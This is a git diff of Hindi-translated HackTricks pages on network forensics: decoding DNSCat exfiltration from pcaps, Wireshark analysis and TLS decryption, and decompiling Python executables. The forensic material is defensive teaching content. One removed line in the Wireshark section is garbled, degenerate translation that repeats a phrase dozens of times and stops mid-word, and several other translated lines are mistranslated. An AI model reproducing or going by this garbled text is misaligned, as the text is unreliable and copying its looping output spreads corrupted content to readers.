<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) से या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। * **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>

View file

@ -13,9 +13,9 @@
</details> </details>
अगर आपके पास **DNSCat द्वारा डेटा एक्सफिल्ट्रेट करने वाला pcap** है (एन्क्रिप्शन का उपयोग न करते हुए), तो आप एक्सफिल्ट्रेट किए गए सामग्री को खोज सकते हैं। अगर आपके पास **DNSCat द्वारा डेटा निकाला जा रहा pcap** है (एन्क्रिप्शन का उपयोग न करते हुए), तो आप निकाले गए सामग्री को खोज सकते हैं।
आपको सिर्फ यह पता होना चाहिए कि **पहले 9 बाइट** वास्तविक डेटा नहीं हैं लेकिन **C\&C संचार** से संबंधित हैं: आपको सिर्फ यह पता होना चाहिए कि **पहले 9 बाइट** वास्तविक डेटा नहीं हैं बल्कि **C\&C संचार** से संबंधित हैं:
```python ```python
from scapy.all import rdpcap, DNSQR, DNSRR from scapy.all import rdpcap, DNSQR, DNSRR
import struct import struct
@ -38,7 +38,7 @@ For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsides
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md) [https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
एक स्क्रिप्ट है जो Python3 के साथ काम करता है: https://github.com/josemlwdf/DNScat-Decoder एक स्क्रिप्ट है जो Python3 के साथ काम करता है: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
``` ```
python3 dnscat_decoder.py sample.pcap bad_domain python3 dnscat_decoder.py sample.pcap bad_domain
``` ```
@ -52,6 +52,6 @@ python3 dnscat_decoder.py sample.pcap bad_domain
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। * **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके
</details> </details>

View file

@ -1,6 +1,6 @@
# वायरशार्क ट्रिक्स # Wireshark tricks
## वायरशार्क ट्रिक्स ## Wireshark tricks
<details> <details>
@ -8,19 +8,19 @@
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* अगर आप अपनी कंपनी की विज्ञापनित करना चाहते हैं **HackTricks** में या **HackTricks** को **PDF** में डाउनलोड करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * अगर आप अपनी कंपनी की **विज्ञापनित करना चाहते हैं HackTricks** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks swag प्राप्त करें**](https://peass.creator-spring.com)
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन **The PEASS Family** की खोज करें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। * **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PR जमा करके अपने हैकिंग ट्रिक्स साझा करें।
</details> </details>
## अपने वायरशार्क कौशल को सुधारें ## अपनी Wireshark कौशल क्षमताएँ सुधारें
### ट्यूटोरियल ### ट्यूटोरियल
निम्नलिखित ट्यूटोरियल शानदार हैं जिन्हें सीखने के लिए कुछ ठंडे मूल ट्रिक्स हैं: निम्नलिखित ट्यूटोरियल कुछ शानदार मूलभूत ट्रिक्स सीखने के लिए हैं:
* [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/) * [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/)
* [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/) * [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/)
@ -29,39 +29,37 @@ HackTricks का समर्थन करने के अन्य तरी
### विशेषज्ञ सूचना ### विशेषज्ञ सूचना
**विशेषज्ञ सूचना**
_**विश्लेषण** --> **विशेषज्ञ सूचना**_ पर क्लिक करने पर आपको पैकेट्स में क्या हो रहा है का **अवलोकन** मिलेगा: _**विश्लेषण** --> **विशेषज्ञ सूचना**_ पर क्लिक करने पर आपको पैकेट्स में क्या हो रहा है का **अवलोकन** मिलेगा:
![](<../../../.gitbook/assets/image (570).png>) ![](<../../../.gitbook/assets/image (570).png>)
**संक्षिप्त पते** **संक्षिप्त पते**
_**सांख्यिकी --> संक्षिप्त पते**_ के तहत आपको कई **सूचनाएं** मिलेंगी जो वायरशार्क द्वारा "**संक्षेपित**" की गई थीं जैसे पोर्ट/परिवहन से प्रोटोकॉल, MAC से निर्माता आदि। संचार में क्या शामिल है यह जानना दिलचस्प है। _**सांख्यिकी --> संक्षिप्त पते**_ के तहत आपको कई **सूचनाएं** मिलेंगी जो वायरशार्क द्वारा "**संक्षेपित**" की गई थीं, जैसे पोर्ट/परिवहन से प्रोटोकॉल, MAC से निर्माता आदि। संचार में क्या शामिल है यह जानना दिलचस्प है।
![](<../../../.gitbook/assets/image (571).png>) ![](<../../../.gitbook/assets/image (571).png>)
**प्रोटोकॉल विहारक्रम** **प्रोटोकॉल वर्गीकरण**
_**सांख्यिकी --> प्रोटोकॉल विहारक्रम**_ के तहत आपको संचार में शामिल **प्रोटोकॉल** और उनके बारे में डेटा मिलेगा। _**सांख्यिकी --> प्रोटोकॉल वर्गीकरण**_ के तहत आपको संचार में शामिल **प्रोटोकॉल** मिलेंगे और उनके बारे में डेटा।
![](<../../../.gitbook/assets/image (572).png>) ![](<../../../.gitbook/assets/image (572).png>)
**बातचीतें** **बातचीतें**
_**सांख्यिकी --> बातचीतें**_ के तहत आपको संचार में बातचीतों का **सारांश** और उनके बारे में डेटा मिलेगा। _**सांख्यिकी --> बातचीतें**_ के तहत आपको संचार में बातचीतों का **सारांश** मिलेगा और उनके बारे में डेटा।
![](<../../../.gitbook/assets/image (573).png>) ![](<../../../.gitbook/assets/image (573).png>)
**अंतबिंदु** **अंत स्थल**
_**सांख्यिकी --> अंतबिंदु**_ के तहत आपको संचार में अंतबिंदुओं का **सारांश** और प्रत्येक के बारे में डेटा मिलेगा। _**सांख्यिकी --> अंत स्थल**_ के तहत आपको संचार में अंत स्थलों का **सारांश** मिलेगा और प्रत्येक के बारे में डेटा।
![](<../../../.gitbook/assets/image (575).png>) ![](<../../../.gitbook/assets/image (575).png>)
**DNS जानकारी** **DNS जानकारी**
_**सांख्यिकी --> DNS**_ के तहत आपको दर्ज की गई DNS अनुरोध के बारे में सांख्यिकी मिलेगी। _**सांख्यिकी --> DNS**_ के तहत आपको कैप्चर किए गए DNS अनुरोधों के बारे में सांख्यिकी मिलेगी।
![](<../../../.gitbook/assets/image (577).png>) ![](<../../../.gitbook/assets/image (577).png>)
@ -73,7 +71,7 @@ _**सांख्यिकी --> I/O ग्राफ**_ के तहत आ
### फ़िल्टर ### फ़िल्टर
यहाँ आपको प्रोटोकॉल के आधार पर वायरशार्क फ़िल्टर मिलेगा: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\ यहाँ आप प्रोटोकॉल के आधार पर वायरशार्क फ़िल्टर पा सकते हैं: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
अन्य दिलचस्प फ़िल्टर: अन्य दिलचस्प फ़िल्टर:
* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)` * `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
@ -85,9 +83,11 @@ _**सांख्यिकी --> I/O ग्राफ**_ के तहत आ
### खोज ### खोज
अगर आप सत्रों के पैकेट्स में **सामग्री** खोजना चाहते हैं तो _CTRL+f_ दबाएं। आप मुख्य सूचना पट्टी में नई लेयर जोड़ सकते हैं (संख्या, समय, स्रोत, आदि) दाएं बटन दबाकर और फिर संपादन स्तंभ दबाकर। अगर आप सत्रों के पैकेट्स में **सामग्री** की **खोज** करना चाहते हैं तो _CTRL+f_ दबाएं। आप मुख्य सूचना पट्टी में नई लेयर जोड़ सकते हैं (संख्या, समय, स्रोत, आदि) दाएं बटन दबाकर और फिर संपादन स्तंभ दबाकर।
अभ्यास: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net) ### मुफ्त pcap लैब्स
**मुफ्त चुनौतियों के साथ अभ्यास करें: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)**
## डोमेन्स की पहचान ## डोमेन्स की पहचान
@ -103,7 +103,7 @@ _**सांख्यिकी --> I/O ग्राफ**_ के तहत आ
### DHCP से ### DHCP से
वर्तमान वायरशार्क में `bootp` की बजाय `DHCP` की खोज करनी होगी वर्तमान Wireshark में `bootp` की बजाय `DHCP` की खोज करनी होगी
![](<../../../.gitbook/assets/image (404).png>) ![](<../../../.gitbook/assets/image (404).png>)
@ -115,16 +115,29 @@ _**सांख्यिकी --> I/O ग्राफ**_ के तहत आ
### सर्वर निजी कुंजी के साथ https ट्रैफिक की डिक्रिप्शन ### सर्वर निजी कुंजी के साथ https ट्रैफिक की डिक्रिप्शन
_संपादन>प्राथमिकता>प्रोटोकॉल>ssl>_ _edit>preference>protocol>ssl>_
![](<../../../.gitbook/assets/image (98).png>) ![](<../../../.gitbook/assets/image (98).png>)
_संपादित_ पर क्लिक करें और सर्वर और निजी कुंजी के सभी डेटा को जोड़ें (_IP, पोर्ट, प्रोटोकॉल, कुंजी फ़ाइल और पासवर्ड_) _Edit_ दबाएं और सर्वर और निजी कुंजी के सभी डेटा को जोड़ें (_IP, पोर्ट, प्रोटोकॉल, कुंजी फ़ाइल और पासवर्ड_)
### सममेत्र सत्र कुंजियों के साथ https ट्रैफिक की डिक्रिप्शन ### सममित सत्र कुंजियों के साथ https ट्रैफिक की डिक्रिप्शन
यह पता चलता है कि Firefox और Chrome दोनों TLS ट्रैफिक को एनक्रिप्ट करने के लिए उपयोग किए गए सममेत्र सत्र कुंजी को एक फ़ाइल में लॉग करने का समर्थन करते हैं। फिर आप वायरशार्क को उस फ़ाइल पर पॉइंट कर सकते हैं और प्रेस्टो! डिक्रिप्टेड TLS ट्रैफिक। अधिक जानकारी के लिए: [https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/)\ फायरफॉक्स और क्रोम दोनों के पास TLS सत्र कुंजियों को लॉग करने की क्षमता है, जिन्हें Wireshark के साथ ट्रांसपोर्ट करने के लिए उपयोग किया जा सकता है। यह सुरक्षित संचार का विस्तृत विश्लेषण संभव बनाता है। इस डिक्रिप्शन को कैसे किया जाए, इसके बारे में अधिक विवरण एक मार्गदर्शिका में मिल सकता है [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/).
इसे डिटेक्ट करने के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के ल
इसे डिटेक्ट करने के लिए वातावरण में `SSLKEYLOGFILE` के लिए खोजें
एक साझा कुंजी की फ़ाइल इस तरह दिखेगी:
![](<../../../.gitbook/assets/image (99).png>)
इसे वायरशार्क में आयात करने के लिए जाएं \_edit > preference > protocol > ssl > और इसे (पूर्व)-मास्टर-सीक्रेट लॉग फ़ाइल नाम में आयात करें:
![](<../../../.gitbook/assets/image (100).png>)
## ADB संचार
जहां APK भेजा गया था, वहां से ADB संचार से APK निकालें:
```python ```python
from scapy.all import * from scapy.all import *

View file

@ -6,17 +6,17 @@
दूसरे तरीके HackTricks का समर्थन करने के लिए: दूसरे तरीके HackTricks का समर्थन करने के लिए:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके। * **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original"> <img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
यदि आप **हैकिंग करियर** में रुचि रखते हैं और अहैकेबल को हैक करना चाहते हैं - **हम भर्ती कर रहे हैं!** (_फ्लूएंट पोलिश लिखित और बोली जानी चाहिए_). अगर आप **हैकिंग करियर** में रुचि रखते हैं और अहैकेबल को हैक करना चाहते हैं - **हम भर्ती कर रहे हैं!** (_फ्लूएंट पोलिश लिखित और बोली जानी चाहिए_).
{% embed url="https://www.stmcyber.com/careers" %} {% embed url="https://www.stmcyber.com/careers" %}
@ -41,7 +41,7 @@ pyi-archive_viewer <binary>
? X binary_name ? X binary_name
to filename? /tmp/binary.pyc to filename? /tmp/binary.pyc
``` ```
**Python exe binary** में कंपाइल किए गए फ़ाइल से **.pyc** प्राप्त कर सकते हैं द्वारा चलाने: **पायथन एक्ज़ी बाइनरी** में कंपाइल करके आप **.pyc प्राप्त** कर सकते हैं द्वारा चलाना:
```bash ```bash
python pyinstxtractor.py executable.exe python pyinstxtractor.py executable.exe
``` ```
@ -62,13 +62,13 @@ Unknown magic number 227 in /tmp/binary.pyc
``` ```
इसे ठीक करने के लिए आपको उत्पन्न फ़ाइल की शुरुआत में **सही मैजिक नंबर जोड़ने** की आवश्यकता है। इसे ठीक करने के लिए आपको उत्पन्न फ़ाइल की शुरुआत में **सही मैजिक नंबर जोड़ने** की आवश्यकता है।
**मैजिक नंबर पायथन संस्करण के साथ भिन्न होते हैं**, **पायथन 3.8** का मैजिक नंबर प्राप्त करने के लिए आपको **पायथन 3.8** टर्मिनल खोलने और निष्पादित करने की आवश्यकता होगी: **मैजिक नंबर पायथन संस्करण के साथ भिन्न होते हैं**, **पायथन 3.8** का मैजिक नंबर प्राप्त करने के लिए आपको **पायथन 3.8** टर्मिनल खोलने और निम्नलिखित को निष्पादित करने की आवश्यकता ह:
``` ```
>> import imp >> import imp
>> imp.get_magic().hex() >> imp.get_magic().hex()
'550d0d0a' '550d0d0a'
``` ```
**इस** मामले में पायथन3.8 के लिए **मैजिक नंबर** **`0x550d0d0a`** है, इस त्रुटि को ठीक करने के लिए आपको **.pyc फ़ाइल** की **शुरुआत** में निम्नलिखित बाइट्स जोड़ने की आवश्यकता होगी: `0x0d550a0d000000000000000000000000` **इस** मामले में पायथन3.8 के लिए **मैजिक नंबर** **`0x550d0d0a`** है, तो, इस त्रुटि को ठीक करने के लिए आपको **.pyc फ़ाइल** की **शुरुआत** में निम्नलिखित बाइट्स जोड़ने की आवश्यकता होगी: `0x0d550a0d000000000000000000000000`
**एक बार** जब आपने **उस** मैजिक हेडर को **जोड़ दिया** होगा, तो **त्रुटि ठीक हो जानी चाहिए.** **एक बार** जब आपने **उस** मैजिक हेडर को **जोड़ दिया** होगा, तो **त्रुटि ठीक हो जानी चाहिए.**
@ -80,31 +80,33 @@ hexdump 'binary.pyc' | head
0000020 0700 0000 4000 0000 7300 0132 0000 0064 0000020 0700 0000 4000 0000 7300 0132 0000 0064
0000030 0164 006c 005a 0064 0164 016c 015a 0064 0000030 0164 006c 005a 0064 0164 016c 015a 0064
``` ```
### त्रुटि: सामान्य त्रुटियों का डिकंपाइलिंग ### त्रुटि: सामान्य त्रुटियाँ डिकॉम्पाइलिंग
**अन्य त्रुटियाँ** जैसे: `class 'AssertionError'>; co_code should be one of the types (<class 'str'>, <class 'bytes'>, <class 'list'>, <class 'tuple'>); is type <class 'NoneType'>` प्रकट हो सकती हैं। **अन्य त्रुटियाँ** जैसे: `class 'AssertionError'>; co_code should be one of the types (<class 'str'>, <class 'bytes'>, <class 'list'>, <class 'tuple'>); is type <class 'NoneType'>` दिख सकती हैं।
यह संभावना है कि आपने **सही रूप से मैजिक नंबर नहीं जोड़ा** है या आपने **सही मैजिक नंबर का उपयोग नहीं किया** है, इसलिए सुनिश्चित करें कि आप सही उपयोग कर रहे हैं (या एक नया प्रयास करें)। यह संभावना है कि आपने **सही ढंग से मैजिक नंबर नहीं जोड़ा है** या आपने **सही मैजिक नंबर का उपयोग नहीं किया है**, इसलिए सुनिश्चित करें कि आप सही उपयोग कर रहे हैं (या एक नया प्रयास करें)।
पिछली त्रुटि दस्तावेज़ीकरण की जाँच करें। पिछली त्रुटि संदर्भ की जाँच करें।
## स्वचालित उपकरण ## स्वचालित उपकरण
यह उपकरण [https://github.com/countercept/python-exe-unpacker](https://github.com/countercept/python-exe-unpacker) समुदाय के लिए उपलब्ध कई उपकरणों को **संग्रहित करता है जो शोधकों को सहायता करते हैं एक्जीक्यूटेबल को अनपैक और डिकंपाइल** करने में जिन्हें पायथन में लिखा गया है (py2exe और pyinstaller)। **[python-exe-unpacker उपकरण](https://github.com/countercept/python-exe-unpacker)** कई सामुदायिक उपलब्ध उपकरणों का संयोजन करने वाला एक उपकरण के रूप में काम करता है जो शोधकों को पाइथन में लिखे गए क्रियाशील और डिकॉम्पाइल किए गए कार्यक्रमों को अनपैक और डिकॉम्पाइल करने में मदद करने के लिए डिज़ाइन किए गए हैं, विशेष रूप से जिनका निर्माण py2exe और pyinstaller के साथ किया गया है। यह YARA नियम शामिल करता है ताकि पता लगाया जा सके कि क्या एक कार्यक्रम पाइथन पर आधारित है और निर्माण उपकरण की पुष्टि करता है।
कई YARA नियम उपलब्ध हैं जो यह निर्धारित करने में मदद करते हैं कि एक्जीक्यूटेबल पायथन में लिखा गया है (यह स्क्रिप्ट यह भी पुष्टि करता है कि एक्जीक्यूटेबल या तो py2exe द्वारा बनाया गया है या pyinstaller द्वारा)।
### आयात त्रुटि: फ़ाइल नाम: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' मौजूद नहीं है ### आयात त्रुटि: फ़ाइल नाम: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' मौजूद नहीं है
वर्तमान में, unpy2exe या pyinstxtractor के साथ हमें पायथन बाइटकोड फ़ाइल मिल सकती है जो पूरी नहीं हो सकती है और फिर, इसे **अनकंपाइल6 द्वारा सादा पायथन स्रोत कोड प्राप्त करने के लिए पहचाना नहीं जा सकता**। यह एक गायब पायथन **बाइटकोड संस्करण संख्या** के कारण है। इसलिए हमने एक प्रीपेंड विकल्प शामिल किया; इसमें एक पायथन बाइटकोड संस्करण संख्या शामिल करेगा और डिकंपाइलिंग प्रक्रिया को सुविधाजनक बनाने में मदद करेगा। जब हम अनकंपाइल6 का उपयोग करने का प्रयास करते हैं .pyc फ़ाइल को डिकंपाइल करने के लिए तो एक त्रुटि लौटाता है। हालांकि, **एक बार हम प्रीपेंड विकल्प का उपयोग करते हैं तो हम देख सकते हैं कि पायथन स्रोत कोड सफलतापूर्वक डिकंपाइल किया गया है** एक सामान्य समस्या जो उत्पन्न होती है, वह एक अधूरे पायथन बाइटकोड फ़ाइल से होती है जो **unpy2exe या pyinstxtractor के साथ अनपैकिंग प्रक्रिया** से आती है, जिसके बाद **uncompyle6 द्वारा एक अभावी पायथन बाइटकोड संस्करण संख्या के कारण पहचाना नहीं जाता है**। इस समस्या का समाधान करने के लिए, एक प्रीपेंड विकल्प जोड़ा गया है, जो आवश्यक पायथन बाइटकोड संस्करण संख्या को जोड़ देता है, जिससे डिकॉम्पाइलिंग प्रक्रिया सुविधाजनक होती है।
```
समस्या का उदाहरण:
```python
# Error when attempting to decompile without the prepend option
test@test: uncompyle6 unpacked/malware_3.exe/archive.py test@test: uncompyle6 unpacked/malware_3.exe/archive.py
Traceback (most recent call last): Traceback (most recent call last):
………………………. ...
ImportError: File name: 'unpacked/malware_3.exe/__pycache__/archive.cpython-35.pyc' doesn't exist ImportError: File name: 'unpacked/malware_3.exe/__pycache__/archive.cpython-35.pyc' doesn't exist
``` ```
``` ```python
# Successful decompilation after using the prepend option
test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
[*] On Python 2.7 [*] On Python 2.7
[+] Magic bytes are already appended. [+] Magic bytes are already appended.
@ -112,9 +114,9 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
# Successfully decompiled file # Successfully decompiled file
[+] Successfully decompiled. [+] Successfully decompiled.
``` ```
## अनालिज़िंग पायथन असेंबली ## अनुलोमन पायथन असेंबली का विश्लेषण
यदि आप पिछले कदमों का पालन करके पायथन "मूल" कोड निकालने में सक्षम नहीं थे, तो आप **असेंबली** को **निकालने** का प्रयास कर सकते हैं (लेकिन यह **बहुत विवरणशील नहीं** है, इसलिए पुनः मूल कोड को निकालने का प्रयास करें)। यहाँ [इसमें](https://bits.theorem.co/protecting-a-python-codebase/) मैंने एक बहुत ही सरल कोड पाया है जिससे _.pyc_ बाइनरी को **डिसएसेम्बल** किया जा सकता है (कोड फ्लो को समझने के लिए शुभकामनाएँ)। यदि _.pyc_ पायथन2 से है, तो पायथन2 का उपयोग करें: यदि आप पिछले कदमों का पालन करके पायथन "मूल" कोड निकालने में सक्षम नहीं थे, तो आप कोड को अनुलोमित करने का प्रयास कर सकते हैं (लेकिन यह विवरणात्मक नहीं है, इसलिए पुनः मूल कोड निकालने का प्रयास करें)। [यहाँ](https://bits.theorem.co/protecting-a-python-codebase/) मैंने एक बहुत ही सरल कोड पाया है जिससे आप _.pyc_ बाइनरी को असेम्बल कर सकते हैं (कोड फ्लो को समझने के लिए शुभकामनाएं)। यदि _.pyc_ पायथन2 से है, तो पायथन2 का उपयोग करें:
```bash ```bash
>>> import dis >>> import dis
>>> import marshal >>> import marshal
@ -159,14 +161,14 @@ True
``` ```
## Python से Executable तक ## Python से Executable तक
शुरुआत के लिए, हम आपको दिखाएंगे कि payloads कैसे py2exe और PyInstaller में compile किए जा सकते हैं शुरुआत के लिए, हम आपको दिखाएंगे कि payloads को py2exe और PyInstaller में कैसे compile किया जा सकता है
### py2exe का उपयोग करके payload बनाने के लिए: ### py2exe का उपयोग करके payload बनाने के लिए:
1. [http://www.py2exe.org/](http://www.py2exe.org) से py2exe package को install करें। 1. [http://www.py2exe.org/](http://www.py2exe.org) से py2exe package को install करें।
2. Payload के लिए (इस मामले में, हम इसे hello.py नाम देंगे), Figure 1 में दिए गए script का उपयोग करें। विकल्प "bundle\_files" जिसका मान 1 है, सभी चीजों को एक exe में शामिल करेगा, जिसमें Python interpreter भी शामिल होगा। 2. Payload के लिए (इस मामले में, हम इसे hello.py नाम देंगे), Figure 1 में दिए गए script का उपयोग करें। विकल्प "bundle\_files" जिसका मान 1 है, सब कुछ को Python interpreter के साथ एक exe में bundle करेगा।
